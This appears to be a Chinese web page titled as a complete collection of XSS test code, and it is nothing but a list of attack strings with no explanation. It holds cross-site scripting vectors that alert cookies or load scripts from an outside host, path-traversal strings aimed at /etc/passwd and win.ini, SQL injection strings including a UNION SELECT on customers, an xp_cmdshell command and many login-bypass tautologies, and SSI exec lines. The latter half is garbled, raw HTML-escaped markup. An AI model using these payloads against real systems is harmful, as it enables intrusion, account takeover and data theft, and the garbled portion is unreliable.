XSS跨站测试代码大全


XSS跨站测试代码大全

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

%3f.jsp

%3f.jsp

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

?sql_debug=1

a%5c.aspx

a.jsp/<script>alert('Vulnerable')</script>

a/

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd

..\..\..\..\..\..\..\..\windows\system.ini

\..\..\..\..\..\..\..\..\windows\system.ini

'';!--"<XSS>=&{()}

<IMG src="javascript:alert('XSS');">

<IMG src=javascript:alert('XSS')>

<IMG src=JaVaScRiPt:alert('XSS')>

<IMG src=JaVaScRiPt:alert("XSS")>

<IMG src=javascript:alert('XSS')>

<IMG src=javascript:alert('XSS')>

<IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

"<IMG src=java\0script:alert(\"XSS\")>";' > out

<IMG src=" javascript:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND src="javascript:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER src="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet" href="javascript:alert('XSS');">

<IMG src='vbscript:msgbox("XSS")'>

<IMG src="mocha:

&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG src=&quot;livescript:[code]&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&#39;XSS&#39;);&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IFRAME src=javascript:alert(&#39;XSS&#39;)&gt;&lt;/IFRAME&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;FRAMESET&gt;&lt;FRAME src=javascript:alert(&#39;XSS&#39;)&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;TABLE BACKGROUND=&quot;javascript:alert(&#39;XSS&#39;)&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&#39;XSS&#39;))&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;DIV STYLE=&quot;behaviour: url(&#39;http://www.how-to-hack.org/exploit.html&#39;);&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;DIV STYLE=&quot;width: expression(alert(&#39;XSS&#39;));&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE&gt;@im\port&#39;\ja\vasc\ript:alert(&quot;XSS&quot;)&#39;;&lt;/STYLE&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG STYLE=&#39;xss:expre\ssion(alert(&quot;XSS&quot;))&#39;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&#39;XSS&#39;);&lt;/STYLE&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE 
TYPE=&quot;text/css&quot;&gt;.XSS{background-image:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;A class=&quot;XSS&quot;&gt;&lt;/A&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;)}&lt;/STYLE&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;BASE href=&quot;javascript:alert(&#39;XSS&#39;);//&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">getURL(&quot;javascript:alert(&#39;XSS&#39;)&quot;)</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">a=&quot;get&quot;;b=&quot;URL&quot;;c=&quot;javascript:&quot;;d=&quot;alert(&#39;XSS&#39;);&quot;;eval(a+b+c+d);</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;XML src=&quot;javascript:alert(&#39;XSS&#39;);&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot;&gt; &lt;BODY ONLOAD=&quot;a();&quot;&gt;&lt;SCRIPT&gt;function a(){alert(&#39;XSS&#39;);}&lt;/SCRIPT&gt;&lt;&quot;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT src=&quot;http://xss.ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG src=&quot;javascript:alert(&#39;XSS&#39;)&quot;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;!--#exec cmd=&quot;/bin/echo &#39;&lt;SCRIPT SRC&#39;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &#39;=http://xss.ha.ckers.org/a.js&gt;&lt;/SCRIPT&gt;&#39;&quot;--&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG src=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: 
&#39;times new roman&#39;;">&lt;SCRIPT a=&quot;&gt;&quot; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT =&quot;&gt;&quot; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT a=&quot;&gt;&quot; &#39;&#39; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT &quot;a=&#39;&gt;&#39;&quot; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;A href=http://www.gohttp://www.google.com/ogle.com/&gt;link&lt;/A&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">admin&#39;--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or 0=0 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or 0=0 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">or 0=0 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or 0=0 #</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or 0=0 #</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">or 0=0 #</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or &#39;x&#39;=&#39;x</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or &quot;x&quot;=&quot;x</span></p><p><span style="font-size: 
14px; font-family: &#39;times new roman&#39;;">&#39;) or (&#39;x&#39;=&#39;x</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or 1=1--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or 1=1--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">or 1=1--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or a=a--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or &quot;a&quot;=&quot;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39;) or (&#39;a&#39;=&#39;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot;) or (&quot;a&quot;=&quot;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&quot; or &quot;a&quot;=&quot;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&quot; or 1=1 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&#39; or 1=1 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&#39; or &#39;a&#39;=&#39;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&#39;) or (&#39;a&#39;=&#39;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&quot;) or (&quot;a&quot;=&quot;a

